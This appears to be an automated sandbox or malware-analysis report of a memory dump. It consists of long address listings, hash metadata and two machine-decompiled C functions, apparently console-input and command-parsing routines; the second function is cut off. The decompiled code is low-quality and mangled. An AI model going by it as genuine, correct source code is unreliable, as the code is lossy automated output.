                                                    0x011f115e
                                                    0x011f115e
                                                    0x011d9bae
                                                    0x011d9bb4
                                                    0x011d9bb5
                                                    0x011d9bb7
                                                    0x011d9bb8
                                                    0x011e04cc
                                                    0x011e04d6
                                                    0x011e04dc
                                                    0x011e04df
                                                    0x011e04e1
                                                    0x00000000
                                                    0x011e04e7
                                                    0x011e04f1
                                                    0x011e04f7
                                                    0x011e04fa
                                                    0x011e04fc
                                                    0x011e05d4
                                                    0x011e05d4
                                                    0x011dd812
                                                    0x011dd814
                                                    0x011dd81a
                                                    0x011dd81b
                                                    0x011dd81c
                                                    0x011dd81e
                                                    0x011eb9cb
                                                    0x011eb9cd
                                                    0x011eb9cf
                                                    0x011eb9d5
                                                    0x011eb9d5
                                                    0x011dd826
                                                    0x011dd82c
                                                    0x011dd82e
                                                    0x011dd830
                                                    0x011eb9dd
                                                    0x011eb9de
                                                    0x011eb9e6
                                                    0x011eb9e7
                                                    0x011eb9ed
                                                    0x011eb9ef
                                                    0x011dd836
                                                    0x011dd836
                                                    0x011dd836
                                                    0x011dd838
                                                    0x011dd838
                                                    0x011dd83f
                                                    0x011dd840
                                                    0x011dd845
                                                    0x011dd847
                                                    0x011eb9fa
                                                    0x011eb9fe
                                                    0x00000000
                                                    0x011dd84d
                                                    0x011dd84d
                                                    0x011dd84f
                                                    0x011dd855
                                                    0x011dd871
                                                    0x011dd873
                                                    0x011dd875
                                                    0x011dd875
                                                    0x011dd877
                                                    0x011dd857
                                                    0x011dd861
                                                    0x011dd867
                                                    0x011dd868
                                                    0x011dd869
                                                    0x011dd86b
                                                    0x011dd919
                                                    0x011dd91b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011dd86b
                                                    0x011dd87c
                                                    0x011dd87e
                                                    0x011dd883
                                                    0x011dd886
                                                    0x011dd888
                                                    0x011dd88a
                                                    0x011dd88c
                                                    0x011dd921
                                                    0x011dd924
                                                    0x011dd932
                                                    0x011dd932
                                                    0x011dd926
                                                    0x011dd926
                                                    0x011dd88c
                                                    0x011dd894
                                                    0x011dd895
                                                    0x011dd89a
                                                    0x011dd89d
                                                    0x011dd89f
                                                    0x011eba09
                                                    0x011eba09
                                                    0x011dd8a5
                                                    0x011dd8aa
                                                    0x011dd8ac
                                                    0x011dd8d7
                                                    0x011dd8d7
                                                    0x011dd8d8
                                                    0x011dd8da
                                                    0x011dd8db
                                                    0x011dd8dc
                                                    0x011dd8ae
                                                    0x011dd8ae
                                                    0x011dd8b0
                                                    0x011dd8b5
                                                    0x011dd8c0
                                                    0x011dd8c6
                                                    0x011dd8c7
                                                    0x011dd8c8
                                                    0x011dd8ca
                                                    0x011dd8dd
                                                    0x011dd8e2
                                                    0x011dd8e5
                                                    0x011dd8ea
                                                    0x011dd8ec
                                                    0x011eba13
                                                    0x011eba1f
                                                    0x011eba25
                                                    0x011eba26
                                                    0x011eba26
                                                    0x011eba26
                                                    0x011eba28
                                                    0x011dda46
                                                    0x011dda46
                                                    0x011dda49
                                                    0x011dda4b
                                                    0x011dda4d
                                                    0x00000000
                                                    0x00000000
                                                    0x011dd9f1
                                                    0x011dd9f4
                                                    0x011dd9f6
                                                    0x011dd9f9
                                                    0x011dd9f9
                                                    0x011dd9fc
                                                    0x011dd9ff
                                                    0x011dd9ff
                                                    0x011dda04
                                                    0x011dda06
                                                    0x011dda08
                                                    0x011dda0d
                                                    0x011dda10
                                                    0x011dda14
                                                    0x011dda19
                                                    0x011dda1c
                                                    0x011dda1e
                                                    0x011dda21
                                                    0x011dda23
                                                    0x011dda26
                                                    0x011dda26
                                                    0x011dda29
                                                    0x011dda2c
                                                    0x011dda2c
                                                    0x011dda31
                                                    0x011dda33
                                                    0x011dda35
                                                    0x011dda36
                                                    0x011dda39
                                                    0x011dda3b
                                                    0x011dda40
                                                    0x00000000
                                                    0x00000000
                                                    0x011dda40
                                                    0x011dda39
                                                    0x011dda1c
                                                    0x011dda4f
                                                    0x011dda55
                                                    0x011dda5b
                                                    0x011dda5e
                                                    0x011eba31
                                                    0x011eba36
                                                    0x00000000
                                                    0x011dda64
                                                    0x011dda66
                                                    0x011dda67
                                                    0x011dda6c
                                                    0x011dda72
                                                    0x011dda74
                                                    0x011ddb8d
                                                    0x011ddb8d
                                                    0x011ddb8f
                                                    0x011dda7a
                                                    0x011dda7a
                                                    0x011dda80
                                                    0x011dda83
                                                    0x011dda88
                                                    0x011dda8b
                                                    0x011dda8d
                                                    0x011dda8d
                                                    0x011dda90
                                                    0x011dda92
                                                    0x011dda98
                                                    0x011dda98
                                                    0x011dda9b
                                                    0x011dda9b
                                                    0x011dda9e
                                                    0x00000000
                                                    0x011ddaa4
                                                    0x011ddaa6
                                                    0x011ddaac
                                                    0x011ddaad
                                                    0x011ddaaf
                                                    0x011eba90
                                                    0x011eba90
                                                    0x00000000
                                                    0x011ddab5
                                                    0x011ddab7
                                                    0x011ddabd
                                                    0x011ddabe
                                                    0x011ddac1
                                                    0x00000000
                                                    0x011ddac7
                                                    0x011ddac7
                                                    0x011ddac9
                                                    0x011ddace
                                                    0x011ddad0
                                                    0x011eba41
                                                    0x011eba43
                                                    0x011eba48
                                                    0x011eba4a
                                                    0x00000000
                                                    0x011eba50
                                                    0x011eba56
                                                    0x011eba5c
                                                    0x011eba5e
                                                    0x011eba64
                                                    0x011eba66
                                                    0x00000000
                                                    0x011eba6c
                                                    0x011eba6e
                                                    0x011eba7e
                                                    0x011eba83
                                                    0x011eba84
                                                    0x011eba86
                                                    0x00000000
                                                    0x011eba86
                                                    0x011eba66
                                                    0x011ddad6
                                                    0x011ddad6
                                                    0x011ddad6
                                                    0x011ddad8
                                                    0x011ddadd
                                                    0x011ddae0
                                                    0x011ddae2
                                                    0x011ebb26
                                                    0x011ebb36
                                                    0x011ebb3b
                                                    0x011ebb3c
                                                    0x011ebb3e
                                                    0x011ebb43
                                                    0x011ebb43
                                                    0x011ebb48
                                                    0x011ebb4b
                                                    0x011ebb4e
                                                    0x00000000
                                                    0x011ddae8
                                                    0x011ddae8
                                                    0x011ddaea
                                                    0x011ddaef
                                                    0x011ddaef
                                                    0x011ddaf2
                                                    0x011ddaf6
                                                    0x011ddb6d
                                                    0x011ddb6f
                                                    0x011ddb73
                                                    0x011ddb76
                                                    0x011ddb78
                                                    0x011ddb7c
                                                    0x011ddb7f
                                                    0x011ddb84
                                                    0x011ddb86
                                                    0x00000000
                                                    0x011ddb88
                                                    0x00000000
                                                    0x011ddb88
                                                    0x011ddaf8
                                                    0x011ddaf8
                                                    0x011ddafd
                                                    0x011ddafe
                                                    0x011eba98
                                                    0x011eba9d
                                                    0x011ebaa2
                                                    0x011ebaa8
                                                    0x011ebaaa
                                                    0x00000000
                                                    0x011ebab0
                                                    0x011ebab0
                                                    0x011ebab5
                                                    0x011ebaba
                                                    0x011ebabc
                                                    0x00000000
                                                    0x011ebac2
                                                    0x011ebac2
                                                    0x011ebac5
                                                    0x011ebac7
                                                    0x011ebac9
                                                    0x011ebac9
                                                    0x011ebad9
                                                    0x011ebadf
                                                    0x011ebae1
                                                    0x00000000
                                                    0x011ebae7
                                                    0x011ebae7
                                                    0x011ebaea
                                                    0x011ebaec
                                                    0x011ebaee
                                                    0x011ebaee
                                                    0x011ebaf4
                                                    0x011ebaf5
                                                    0x00000000
                                                    0x011ebaf5
                                                    0x011ebae1
                                                    0x011ebabc
                                                    0x011ddb04
                                                    0x011ddb07
                                                    0x011ddb09
                                                    0x011ddb0b
                                                    0x011ddb11
                                                    0x011ddb11
                                                    0x011ddb17
                                                    0x011ddb17
                                                    0x011ddb1c
                                                    0x011ddb22
                                                    0x011ddb24
                                                    0x011ebb89
                                                    0x011ebb89
                                                    0x011ebb8e
                                                    0x011ebb94
                                                    0x00000000
                                                    0x011ddb2a
                                                    0x011ddb2a
                                                    0x011ddb2a
                                                    0x011ddb2c
                                                    0x011ebaff
                                                    0x011ebb01
                                                    0x011ebb03
                                                    0x011ebb08
                                                    0x011ebb0e
                                                    0x011ebb10
                                                    0x011ebb15
                                                    0x011ebb18
                                                    0x011ebb58
                                                    0x011ebb58
                                                    0x011ebb5f
                                                    0x011ebb7c
                                                    0x00000000
                                                    0x011ebb1a
                                                    0x011ebb1a
                                                    0x011ebb1c
                                                    0x00000000
                                                    0x011ebb1c
                                                    0x011ddb32
                                                    0x011ddb32
                                                    0x011ddb32
                                                    0x011ddb34
                                                    0x00000000
                                                    0x011ddb3a
                                                    0x011ddb3a
                                                    0x011ddb40
                                                    0x00000000
                                                    0x011ddb40
                                                    0x011ddb34
                                                    0x011ddb2c
                                                    0x011ddb24
                                                    0x011ddafe
                                                    0x011ddaf6
                                                    0x011ddae2
                                                    0x011ddad0
                                                    0x011ddac1
                                                    0x011ddaaf
                                                    0x00000000
                                                    0x011ddb43
                                                    0x011ddb43
                                                    0x011ddb46
                                                    0x011ddb48
                                                    0x011ddb48
                                                    0x011dda9b
                                                    0x011dda92
                                                    0x011dda74
                                                    0x011ddb50
                                                    0x011ddb53
                                                    0x011ddb59
                                                    0x011ddb5a
                                                    0x011ddb5d
                                                    0x011ddb5f
                                                    0x011ddb60
                                                    0x011ddb61
                                                    0x011ddb61
                                                    0x011ddb63
                                                    0x011ddb64
                                                    0x011ddb69
                                                    0x011ddb6b
                                                    0x011ddb6c
                                                    0x00000000
                                                    0x011ddb6c
                                                    0x011dd8f2
                                                    0x011dd8f2
                                                    0x011dd8f8
                                                    0x011dd8fb
                                                    0x011dd8fe
                                                    0x011dd905
                                                    0x011dd906
                                                    0x011dd90b
                                                    0x011dd90e
                                                    0x011dd910
                                                    0x011dd912
                                                    0x011dd912
                                                    0x00000000
                                                    0x011dd910
                                                    0x011dd8cc
                                                    0x011dd8ce
                                                    0x011dd8d0
                                                    0x011dd8d0
                                                    0x011dd8d2
                                                    0x00000000
                                                    0x011dd8d2
                                                    0x011dd8ca
                                                    0x011dd8ac
                                                    0x011e0502
                                                    0x011e050c
                                                    0x011e0512
                                                    0x011e0515
                                                    0x011e0517
                                                    0x00000000
                                                    0x011e051d
                                                    0x011e0527
                                                    0x011e052d
                                                    0x011e0530
                                                    0x011e0532
                                                    0x011e0551
                                                    0x011e0551
                                                    0x011dde5e
                                                    0x011dde60
                                                    0x011dde66
                                                    0x011dde67
                                                    0x011dde68
                                                    0x011dde6a
                                                    0x011ebca8
                                                    0x011ebcaa
                                                    0x011ebcac
                                                    0x011ebcb2
                                                    0x011ebcb2
                                                    0x011dde72
                                                    0x011dde78
                                                    0x011dde7a
                                                    0x011dde7c
                                                    0x011ebcba
                                                    0x011ebcbb
                                                    0x011ebcc3
                                                    0x011ebcc4
                                                    0x011ebcca
                                                    0x011ebccc
                                                    0x011dde82
                                                    0x011dde82
                                                    0x011dde82
                                                    0x011dde84
                                                    0x011dde84
                                                    0x011dde8b
                                                    0x011dde8c
                                                    0x011dde91
                                                    0x011dde93
                                                    0x011ebcd7
                                                    0x011ebcdb
                                                    0x00000000
                                                    0x011dde99
                                                    0x011dde9b
                                                    0x011dde9d
                                                    0x011dde9f
                                                    0x011ddea4
                                                    0x011ddea9
                                                    0x011ddeab
                                                    0x011ddee6
                                                    0x011ddee6
                                                    0x011ddee7
                                                    0x011ddee9
                                                    0x011ddeea
                                                    0x011ddeeb
                                                    0x011ddead
                                                    0x011ddeaf
                                                    0x011ddeb0
                                                    0x011ddeb5
                                                    0x011ddeba
                                                    0x011ddeee
                                                    0x011ddef0
                                                    0x011ddef2
                                                    0x00000000
                                                    0x011ddebc
                                                    0x011ddebc
                                                    0x011ddec1
                                                    0x011ddec4
                                                    0x011ddec9
                                                    0x011ddecb
                                                    0x011ebce6
                                                    0x011ebcf2
                                                    0x011ebcf8
                                                    0x011ebcf9
                                                    0x011ebcfb
                                                    0x011ebd01
                                                    0x011ebd03
                                                    0x011ebd03
                                                    0x011ddfb0
                                                    0x011ddfb1
                                                    0x011ddfb2
                                                    0x011ddfb4
                                                    0x011ddfb5
                                                    0x011dded1
                                                    0x011dded1
                                                    0x011dded7
                                                    0x011ddede
                                                    0x011ddee1
                                                    0x00000000
                                                    0x011ddee1
                                                    0x011ddecb
                                                    0x011ddeba
                                                    0x011ddeab
                                                    0x011e0534
                                                    0x011e053e
                                                    0x011e0544
                                                    0x011e0547
                                                    0x011e0549
                                                    0x00000000
                                                    0x011e054b
                                                    0x011e054b
                                                    0x011ded82
                                                    0x011ded83
                                                    0x011ded85
                                                    0x011ded88
                                                    0x011ded89
                                                    0x011ded8a
                                                    0x011ded8d
                                                    0x011ded94
                                                    0x011ded95
                                                    0x011ded95
                                                    0x011ded97
                                                    0x011ded9f
                                                    0x011deda1
                                                    0x011deda4
                                                    0x011deda4
                                                    0x011deda9
                                                    0x011dedab
                                                    0x00000000
                                                    0x00000000
                                                    0x011dedad
                                                    0x011dedb2
                                                    0x011dedb7
                                                    0x011dedbc
                                                    0x011dede9
                                                    0x011dedec
                                                    0x011dedf2
                                                    0x011dedf4
                                                    0x011ec0ad
                                                    0x011ec0b0
                                                    0x011ec0b0
                                                    0x011ec0b3
                                                    0x011ec0b6
                                                    0x011ec0b6
                                                    0x011ec0bb
                                                    0x011ec0bf
                                                    0x011ec0bf
                                                    0x011dedfa
                                                    0x011dee02
                                                    0x011dee04
                                                    0x011dee07
                                                    0x011dee09
                                                    0x011ec0f7
                                                    0x011ec103
                                                    0x011ec109
                                                    0x011ec10a
                                                    0x011ec111
                                                    0x011ec117
                                                    0x011ec117
                                                    0x011defe1
                                                    0x011defe1
                                                    0x011defe3
                                                    0x011defea
                                                    0x011defef
                                                    0x011ec121
                                                    0x011ec123
                                                    0x011ec125
                                                    0x011ec125
                                                    0x011deff5
                                                    0x011deff7
                                                    0x011deff8
                                                    0x011deff9
                                                    0x011deffa
                                                    0x011deffb
                                                    0x011dee0f
                                                    0x011dee0f
                                                    0x011dee12
                                                    0x011dee14
                                                    0x011ec0c7
                                                    0x011ec0c9
                                                    0x011ec0cb
                                                    0x011ec0cb
                                                    0x011dee1a
                                                    0x011dee1c
                                                    0x011dee1e
                                                    0x011ec0d5
                                                    0x011ec0d5
                                                    0x011dee24
                                                    0x011dee24
                                                    0x011dee2a
                                                    0x00000000
                                                    0x00000000
                                                    0x011dee2a
                                                    0x011dee30
                                                    0x011dee32
                                                    0x011ec0f0
                                                    0x011ec0f0
                                                    0x011dee38
                                                    0x011dee38
                                                    0x011dee3a
                                                    0x011dee3c
                                                    0x011dee3e
                                                    0x011dee40
                                                    0x011ec0eb
                                                    0x011ec0eb
                                                    0x00000000
                                                    0x011dee46
                                                    0x011dee46
                                                    0x011dee46
                                                    0x011dee49
                                                    0x00000000
                                                    0x00000000
                                                    0x011ec0df
                                                    0x011ec0e2
                                                    0x011ec0e2
                                                    0x011ec0e5
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011ec0e5
                                                    0x011dee4f
                                                    0x011dee51
                                                    0x00000000
                                                    0x011dee57
                                                    0x011dee57
                                                    0x011dee59
                                                    0x011dee59
                                                    0x011dee59
                                                    0x011dee51
                                                    0x011dee40
                                                    0x011dee5b
                                                    0x011dee5b
                                                    0x011dee5d
                                                    0x011dee5f
                                                    0x011dee62
                                                    0x011dee64
                                                    0x011dee67
                                                    0x011dee67
                                                    0x011dee69
                                                    0x011dee99
                                                    0x011dee99
                                                    0x011dee6b
                                                    0x011dee6b
                                                    0x011dee6d
                                                    0x011dee73
                                                    0x011dee75
                                                    0x011dee7a
                                                    0x011dee7c
                                                    0x011dee7c
                                                    0x011dee80
                                                    0x011dee80
                                                    0x011dee82
                                                    0x00000000
                                                    0x00000000
                                                    0x011dee84
                                                    0x011dee88
                                                    0x011dee8b
                                                    0x00000000
                                                    0x011dee8d
                                                    0x011dee8d
                                                    0x011dee90
                                                    0x011dee91
                                                    0x011dee94
                                                    0x011dee94
                                                    0x011dee97
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x011dee97
                                                    0x00000000
                                                    0x011dee8b
                                                    0x011dee9e
                                                    0x011deea0
                                                    0x00000000
                                                    0x00000000
                                                    0x011deea0
                                                    0x011deea2
                                                    0x011deea2
                                                    0x011deea5
                                                    0x011deea5
                                                    0x011deea7
                                                    0x011deea7
                                                    0x011deeaa
                                                    0x00000000
                                                    0x011deeaa
                                                    0x011dedbe
                                                    0x011dedbe
                                                    0x011dedc1
                                                    0x011dedc3
                                                    0x011dedc8
                                                    0x011dedca
                                                    0x011deeb2
                                                    0x011deeb4
                                                    0x011deeb4
                                                    0x011deeb4
                                                    0x011deeb7
                                                    0x011deeb9
                                                    0x011deebc
                                                    0x011deebc
                                                    0x011deec0
                                                    0x00000000
                                                    0x011dedd0
                                                    0x011dedd1
                                                    0x011dedd3
                                                    0x011dedd3
                                                    0x011dedd5
                                                    0x00000000
                                                    0x011dedd5
                                                    0x011dedca
                                                    0x00000000
                                                    0x011dedbc
                                                    0x011dedda
                                                    0x011deddd
                                                    0x011dedde
                                                    0x011dede1
                                                    0x011dede3
                                                    0x011dede4
                                                    0x011dede5
                                                    0x011dede7
                                                    0x011dede8
                                                    0x011dede8
                                                    0x011e0549
                                                    0x011e0532
                                                    0x011e0517
                                                    0x011e04fc
                                                    0x011e04e1
                                                    0x011e04c6
                                                    0x00000000

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: _wcsicmp
                                                    • String ID: FOR$FOR/?$IF/?$REM$REM/?
                                                    • API String ID: 2081463915-3874590324
                                                    • Opcode ID: 611c1124308175d04c15a5d01d8614793ad6044b52ab7373355629c5de85a2b9
                                                    • Instruction ID: 8eb187385da68ff4cc7cd007489d28d1ed612b1a834babaa0ba62ce91a1e800a
                                                    • Opcode Fuzzy Hash: 611c1124308175d04c15a5d01d8614793ad6044b52ab7373355629c5de85a2b9
                                                    • Instruction Fuzzy Hash: A131AF247807128BEF3E6BF9B81D36A26D09F04749F48802AF642952C5DFA091C6C766
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011F474C, Relevance: 18.2, APIs: 12, Instructions: 203COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E011F474C(void* __ebx, void* __ecx, char* __edx, void* __edi, void* __esi) {
				signed int _v8;
				char _v2060;
				char _v2061;
				char _v2062;
				signed int _v2068;
				long _v2072;
				long _v2076;
				void* _v2080;
				intOrPtr _v2088;
				signed int _t36;
				long* _t38;
				void* _t40;
				signed int _t43;
				long _t44;
				wchar_t* _t45;
				void* _t48;
				void* _t49;
				void* _t53;
				void* _t58;
				signed int _t60;
				void* _t61;
				intOrPtr _t63;
				wchar_t* _t70;
				long _t71;
				wchar_t* _t72;
				wchar_t* _t74;
				void* _t77;
				void* _t78;
				intOrPtr _t89;
				void* _t102;
				long _t103;
				wchar_t* _t104;
				void* _t106;
				wchar_t* _t107;
				signed int _t108;

				_t99 = __edx;
				_t36 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t36 ^ _t108;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v2061 = 0;
				_v2062 = 0;
				_t38 = E011DDF40(__ecx);
				if(_t38 == 0) {
					L3:
					_t40 = 1;
					goto L4;
				} else {
					_t82 = _t38;
					_t107 = E011E2430(_t38);
					_t43 =  *_t107 & 0x0000ffff;
					if(_t43 != 0) {
						_t103 = 0x22;
						if(_t43 == _t103) {
							_t5 =  &(_t107[0]); // 0x2
							_t107 = E011E2430(_t5);
							_t74 = wcsrchr(_t107, _t103);
							if(_t74 != 0) {
								 *_t74 = 0;
							}
						}
						_t44 = 0x3d;
						_t45 = wcschr(_t107, _t44);
						_pop(_t82);
						if(_t45 == 0) {
							goto L2;
						} else {
							 *_t45 = 0;
							_t6 =  &(_t45[0]); // 0x2
							_t82 = _t6;
							_t104 = E011E2430(_t6);
							_t48 = 0x22;
							if( *_t104 == _t48) {
								_t7 =  &(_t104[0]); // 0x2
								_t70 = E011E2430(_t7);
								_t104 = _t70;
								_t71 = 0x22;
								_t72 = wcsrchr(_t104, _t71);
								_pop(_t82);
								if(_t72 != 0) {
									_t82 = 0;
									 *_t72 = 0;
								}
							}
							_t49 = 0x3d;
							if( *_t104 == _t49) {
								goto L2;
							} else {
								_t78 = GetStdHandle(0xfffffff5);
								if(GetConsoleMode(_t78,  &_v2072) != 0) {
									_v2061 = 1;
									SetConsoleMode(_t78, _v2072 | 0x00000001);
								}
								_t53 = GetStdHandle(0xfffffff6);
								_t87 =  &_v2076;
								_v2080 = _t53;
								if(GetConsoleMode(_t53,  &_v2076) != 0) {
									_t87 = _v2076 | 0x00000007;
									_v2062 = 1;
									SetConsoleMode(_v2080, _v2076 | 0x00000007);
								}
								E011DC108(_t87, 0x2371, 1, _t104);
								_v2060 = 0;
								_t58 = GetStdHandle(0xfffffff6);
								_t99 =  &_v2060;
								_t88 = _t58;
								if(E011F3B11(_t58,  &_v2060, 0x3ff,  &_v2068) == 0) {
									L23:
									_t60 = 0;
									_v2068 = 0;
								} else {
									_t60 = _v2068;
									if(_t60 == 0) {
										goto L23;
									} else {
										_t88 = _t108 + _t60 * 2 - 0x80a;
										while( *_t88 < 0x20) {
											_t60 = _t60 - 1;
											_t88 = _t88 - 2;
											_v2068 = _t60;
											if(_t60 != 0) {
												continue;
											} else {
											}
											goto L24;
										}
									}
								}
								L24:
								if(_v2061 != 0) {
									SetConsoleMode(_t78, _v2072);
									_t60 = _v2068;
								}
								if(_v2062 != 0) {
									SetConsoleMode(_v2080, _v2076);
									_t60 = _v2068;
								}
								if(_t60 == 0) {
									goto L3;
								} else {
									_t61 = _t60 + _t60;
									if(_t61 >= 0x800) {
										E011E711D(_t61, _t78, _t88, _t99, _t104, _t107);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t108);
										_t89 = _v2088;
										if( *0x11fd5fc == 2) {
											_t63 = E011F46A5(_t89, 0);
											L35:
											 *0x120b8b0 = _t63;
											return _t63;
										}
										_t63 = E011F46A5(_t89, 0);
										if(_t63 != 0) {
											goto L35;
										}
										return _t63;
									} else {
										_t99 =  &_v2060;
										 *((short*)(_t108 + _t61 - 0x808)) = 0;
										_t40 = E011E3A50(_t107,  &_v2060);
										L4:
										_pop(_t102);
										_pop(_t106);
										_pop(_t77);
										return E011E6FD0(_t40, _t77, _v8 ^ _t108, _t99, _t102, _t106);
									}
								}
							}
						}
					} else {
						L2:
						_push(0);
						_push(0x232a);
						E011DC5A2(_t82);
						goto L3;
					}
				}
			}






































                                                    0x011f474c
                                                    0x011f4757
                                                    0x011f475e
                                                    0x011f4761
                                                    0x011f4762
                                                    0x011f4765
                                                    0x011f4766
                                                    0x011f476c
                                                    0x011f4772
                                                    0x011f4779
                                                    0x011f4799
                                                    0x011f479b
                                                    0x00000000
                                                    0x011f477b
                                                    0x011f477b
                                                    0x011f4782
                                                    0x011f4784
                                                    0x011f478a
                                                    0x011f47af
                                                    0x011f47b3
                                                    0x011f47b5
                                                    0x011f47bd
                                                    0x011f47c1
                                                    0x011f47cb
                                                    0x011f47cf
                                                    0x011f47cf
                                                    0x011f47cb
                                                    0x011f47d4
                                                    0x011f47d7
                                                    0x011f47de
                                                    0x011f47e1
                                                    0x00000000
                                                    0x011f47e3
                                                    0x011f47e5
                                                    0x011f47e8
                                                    0x011f47e8
                                                    0x011f47f0
                                                    0x011f47f4
                                                    0x011f47f8
                                                    0x011f47fa
                                                    0x011f47fd
                                                    0x011f4804
                                                    0x011f4806
                                                    0x011f4809
                                                    0x011f4810
                                                    0x011f4813
                                                    0x011f4815
                                                    0x011f4817
                                                    0x011f4817
                                                    0x011f4813
                                                    0x011f481c
                                                    0x011f4820
                                                    0x00000000
                                                    0x011f4826
                                                    0x011f482e
                                                    0x011f4840
                                                    0x011f484b
                                                    0x011f4854
                                                    0x011f4854
                                                    0x011f485c
                                                    0x011f4862
                                                    0x011f4868
                                                    0x011f4878
                                                    0x011f4880
                                                    0x011f4883
                                                    0x011f4891
                                                    0x011f4891
                                                    0x011f489f
                                                    0x011f48a9
                                                    0x011f48be
                                                    0x011f48c4
                                                    0x011f48ca
                                                    0x011f48d3
                                                    0x011f48fc
                                                    0x011f48fc
                                                    0x011f48fe
                                                    0x011f48d5
                                                    0x011f48d5
                                                    0x011f48dd
                                                    0x00000000
                                                    0x011f48df
                                                    0x011f48df
                                                    0x011f48e6
                                                    0x011f48ec
                                                    0x011f48ed
                                                    0x011f48f0
                                                    0x011f48f8
                                                    0x00000000
                                                    0x00000000
                                                    0x011f48fa
                                                    0x00000000
                                                    0x011f48f8
                                                    0x011f48e6
                                                    0x011f48dd
                                                    0x011f4904
                                                    0x011f490b
                                                    0x011f4914
                                                    0x011f491a
                                                    0x011f491a
                                                    0x011f4927
                                                    0x011f4935
                                                    0x011f493b
                                                    0x011f493b
                                                    0x011f4943
                                                    0x00000000
                                                    0x011f4949
                                                    0x011f4949
                                                    0x011f4950
                                                    0x011f496e
                                                    0x011f4973
                                                    0x011f4974
                                                    0x011f4975
                                                    0x011f4976
                                                    0x011f4977
                                                    0x011f4978
                                                    0x011f4979
                                                    0x011f497a
                                                    0x011f497b
                                                    0x011f497c
                                                    0x011f497d
                                                    0x011f497e
                                                    0x011f497f
                                                    0x011f4982
                                                    0x011f4985
                                                    0x011f4991
                                                    0x011f499e
                                                    0x011f49a3
                                                    0x011f49a3
                                                    0x00000000
                                                    0x011f49a3
                                                    0x011f4993
                                                    0x011f499a
                                                    0x00000000
                                                    0x011f499c
                                                    0x011f49a9
                                                    0x011f4952
                                                    0x011f4954
                                                    0x011f495a
                                                    0x011f4964
                                                    0x011f479c
                                                    0x011f479f
                                                    0x011f47a0
                                                    0x011f47a3
                                                    0x011f47ac
                                                    0x011f47ac
                                                    0x011f4950
                                                    0x011f4943
                                                    0x011f4820
                                                    0x011f478c
                                                    0x011f478c
                                                    0x011f478c
                                                    0x011f478d
                                                    0x011f4792
                                                    0x00000000
                                                    0x011f4798
                                                    0x011f478a

                                                    APIs
                                                      • Part of subcall function 011E2430: iswspace.MSVCRT ref: 011E2440
                                                    • wcsrchr.MSVCRT ref: 011F47C1
                                                    • wcschr.MSVCRT ref: 011F47D7
                                                    • wcsrchr.MSVCRT ref: 011F4809
                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 011F4828
                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F4838
                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F4854
                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 011F485C
                                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F4870
                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 011F4891
                                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,000003FF,?), ref: 011F48BE
                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011F4914
                                                    • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 011F4935
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: ConsoleMode$Handle$wcsrchr$iswspacewcschr
                                                    • String ID:
                                                    • API String ID: 4166807220-0
                                                    • Opcode ID: feb92c1057ab0264ce8de76f445391a2f9bb90ab11888967d501e019172ba27e
                                                    • Instruction ID: cf5ea08ca5dbc6c56bd1edcd91df0f1f0d025a92a1e8be328efb88a7cff37b97
                                                    • Opcode Fuzzy Hash: feb92c1057ab0264ce8de76f445391a2f9bb90ab11888967d501e019172ba27e
                                                    • Instruction Fuzzy Hash: F351D7316002199AEF39EB78EC18BBA77F8FF14314F0485ADE645C2580EF708985CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011FA834, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 251COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 65%
                                                    			E011FA834(intOrPtr __ecx, DWORD* __edx) {
				signed int _v8;
				char _v524;
				int _v532;
				char _v536;
				int _v540;
				void _v1060;
				long _v1068;
				char _v1072;
				int _v1076;
				void _v1596;
				int _v1604;
				char _v1608;
				void* _v1612;
				void _v2132;
				intOrPtr _v2136;
				intOrPtr _v2140;
				signed short _v2142;
				long _v2144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t65;
				intOrPtr _t98;
				WCHAR* _t102;
				short* _t104;
				WCHAR* _t105;
				DWORD* _t107;
				signed short _t108;
				DWORD* _t120;
				void* _t131;
				WCHAR* _t133;
				short* _t134;
				WCHAR* _t136;
				short* _t138;
				intOrPtr* _t142;
				signed int _t144;
				DWORD* _t146;
				signed int _t148;

				_t141 = __edx;
				_t65 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t65 ^ _t148;
